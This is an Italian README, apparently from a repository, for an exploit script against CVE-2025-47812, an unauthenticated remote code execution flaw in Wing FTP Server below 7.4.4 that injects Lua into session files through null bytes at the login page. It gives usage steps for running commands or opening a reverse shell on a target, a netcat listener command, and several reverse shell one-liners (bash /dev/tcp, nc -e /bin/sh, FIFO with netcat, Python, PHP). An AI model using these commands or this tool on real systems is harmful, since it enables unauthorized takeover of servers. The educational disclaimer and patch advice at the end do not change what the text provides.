
Exploit di esecuzione remota di codice non autenticato per Wing FTP Server < 7.4.4, che abilita l'esecuzione di comandi e reverse shell tramite iniezione Lua nei file di sessione.
CVE-2025-47812 - Esecuzione Remota di Codice (RCE) su Wing FTP Server
===========================================================
Autore: blindma1den
Data: Luglio 2025
Tipo di Exploit: Esecuzione Remota di Codice (Non Autenticato)
Target: Wing FTP Server < 7.4.4
Punteggio CVSS: 10.0 (Critico)
Questo script sfrutta CVE-2025-47812, una vulnerabilità critica nell'interfaccia web di Wing FTP Server che consente ad attaccanti remoti di eseguire comandi di sistema arbitrari o aprire una reverse shell senza autenticazione.
Il difetto è causato da una gestione impropria dei byte nulli (%00)
nel modulo di login (/loginok.html). Ciò consente l'iniezione di
codice Lua nei file di sessione, che vengono successivamente valutati
quando vengono acceduti endpoint come /dir.html.
Descrizione NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-47812
whoami, uname -a)Installa le dipendenze:
pip install requests
Esegui lo script:
python3 wingftp_rce_exploit.py
Ti verranno richiesti:
[1] ESECUZIONE COMANDO:
Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 1
Command to execute (default: whoami): whoami
[2] REVERSE SHELL:
Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 2
Reverse shell IP address: 192.168.1.100
Reverse shell port: 4444
Avvia il tuo listener prima di attivare la shell:
nc -lvnp 4444
Bash: bash -i >& /dev/tcp/IP/PORT 0>&1
Python3: python3 -c 'import socket,subprocess,os; ...'
Netcat: nc IP PORT -e /bin/sh
PHP: php -r '$sock=fsockopen("IP",PORT); ...'
FIFO + Netcat: rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i ...
Questo codice è solo a scopo educativo. NON utilizzare questo exploit contro sistemi che non possiedi o per i quali non hai esplicita autorizzazione al test. L'uso non autorizzato è illegale e non etico.
Applica immediatamente le patch ai tuoi sistemi. Wing FTP Server 7.4.4 risolve questa vulnerabilità.
Buon hacking!